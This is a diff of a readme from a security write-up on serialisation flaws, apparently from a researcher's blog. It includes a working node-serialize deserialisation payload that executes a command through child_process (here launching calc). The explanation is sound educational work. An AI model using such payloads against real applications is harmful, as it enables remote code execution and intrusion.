klezVirus/klezVirus.github.io/The_Big_Problem_of_Serialisation/readme.md

 77. }
 ```

-So if we serialize an object like this:
+Which meanse that if a serialized object, like the following, is deserialized by node-deserialize:

 ```js
 {"rce":"_$$ND_FUNC$$_function() { CMD = \"cmd /c calc\"; require('child_process').exec(CMD, function(error, stdout, stderr) { console.log(stdout) }); }()"}
 ```

-We would achieve remote code execution on the target machine (in this case, spawn a calculator on a Windows box).
+The application would execute an arbitrary command on the target machine (in this case, spawn a calculator on a Windows box).

 **funcster**